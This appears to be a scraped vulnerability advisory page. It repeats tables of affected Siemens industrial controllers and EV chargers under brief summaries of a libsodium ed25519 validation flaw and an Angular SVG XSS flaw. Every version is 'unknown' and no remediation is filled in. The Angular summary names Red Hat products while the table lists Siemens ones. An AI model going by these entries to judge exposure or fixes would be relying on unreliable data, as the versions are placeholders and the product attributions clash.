vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518TF-4 PN/DP (6ES7518-4UP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU S7-1518-4 PN/DP ODK (6ES7518-4AP00-3AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU S7-1518F-4 PN/DP ODK (6ES7518-4FP00-3AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1513PRO F-2 PN (6ES7513-2GL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1513PRO-2 PN (6ES7513-2PL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1516PRO F-2 PN (6ES7516-2GN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1516PRO-2 PN (6ES7516-2PN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S T V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S TF V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller Linux V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller Linux V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 TM MFP - GNU/Linux subsystem
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-PLCSIM Advanced
|
vers:unknown/* |
Libsodium versions prior to ad3004e contain vulnerabilities in the crypto_core_ed25519_is_valid_point function that cause improper validation of elliptic curve points, potentially allowing security bypasses in custom cryptographic scenarios.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Siemens / Heliox Flex 180 kW EV Charging Station
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / Heliox Mobile DC 40 kW EV Charging Station
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / RUGGEDCOM APE1808
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SICAM SIAPP SDK
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIDIS Prime
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC Drive Controller CPU 1504D TF (6ES7615-4DF10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC Drive Controller CPU 1507D TF (6ES7615-7DF10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SJ01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SK03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DJ01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DK03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SP F-2 PN (6ES7514-2SN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SP-2 PN (6ES7514-2DN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SPT F-2 PN (6ES7514-2WN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SPT-2 PN (6ES7514-2VN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC (incl. SIPLUS variants)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V2 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V3 CPUs - Industrial OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V3 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V2 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V3 CPUs - Industrial OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V3 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513R-1 PN (6ES7513-1RL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513R-1 PN (6ES7513-1RM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513pro F-2 PN (6ES7513-2GM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513pro-2 PN (6ES7513-2PM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515R-2 PN (6ES7515-2RM00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515R-2 PN (6ES7515-2RN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516T-3 PN (6ES7516-3TP10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516T-3 PN/DP (6ES7516-3TN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516TF-3 PN (6ES7516-3UP10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516TF-3 PN/DP (6ES7516-3UN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516pro F-2 PN (6ES7516-2GP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516pro-2 PN (6ES7516-2PP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517-3 PN (6ES7517-3AQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517-3 PN/DP (6ES7517-3AP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN (6ES7517-3FQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517H-3 PN (6ES7517-3HP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517H-4 PN (6ES7517-4HQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517T-3 PN (6ES7517-3TQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517T-3 PN/DP (6ES7517-3TP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517TF-3 PN (6ES7517-3UQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517TF-3 PN/DP (6ES7517-3UP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-3 PN (6ES7518-3AT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP (6ES7518-4AP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-3 PN (6ES7518-3FT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP (6ES7518-4FP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518HF-4 PN (6ES7518-4JP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518HF-4 PN (6ES7518-4JT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518T-3 PN (6ES7518-3TT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518T-4 PN/DP (6ES7518-4TP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518TF-3 PN (6ES7518-3UT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518TF-4 PN/DP (6ES7518-4UP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU S7-1518-4 PN/DP ODK (6ES7518-4AP00-3AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU S7-1518F-4 PN/DP ODK (6ES7518-4FP00-3AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1513PRO F-2 PN (6ES7513-2GL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1513PRO-2 PN (6ES7513-2PL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1516PRO F-2 PN (6ES7516-2GN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1516PRO-2 PN (6ES7516-2PN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S T V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S TF V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller Linux V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller Linux V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 TM MFP - GNU/Linux subsystem
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-PLCSIM Advanced
|
vers:unknown/* |
A Cross-Site Scripting (XSS) vulnerability in the Angular Template Compiler allows for arbitrary JavaScript execution via improperly sanitized SVG `<script>` attributes, affecting several Red Hat products with a moderate severity rating.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Siemens / Heliox Flex 180 kW EV Charging Station
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / Heliox Mobile DC 40 kW EV Charging Station
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / RUGGEDCOM APE1808
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SICAM SIAPP SDK
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIDIS Prime
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC Drive Controller CPU 1504D TF (6ES7615-4DF10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC Drive Controller CPU 1507D TF (6ES7615-7DF10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SJ01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SK03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DJ01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DK03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SP F-2 PN (6ES7514-2SN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SP-2 PN (6ES7514-2DN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SPT F-2 PN (6ES7514-2WN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SPT-2 PN (6ES7514-2VN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC (incl. SIPLUS variants)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V2 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V3 CPUs - Industrial OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V3 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V2 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V3 CPUs - Industrial OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V3 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513R-1 PN (6ES7513-1RL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513R-1 PN (6ES7513-1RM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513pro F-2 PN (6ES7513-2GM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513pro-2 PN (6ES7513-2PM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515R-2 PN (6ES7515-2RM00-0AB0)
|
vers:unknown/* | ||
|
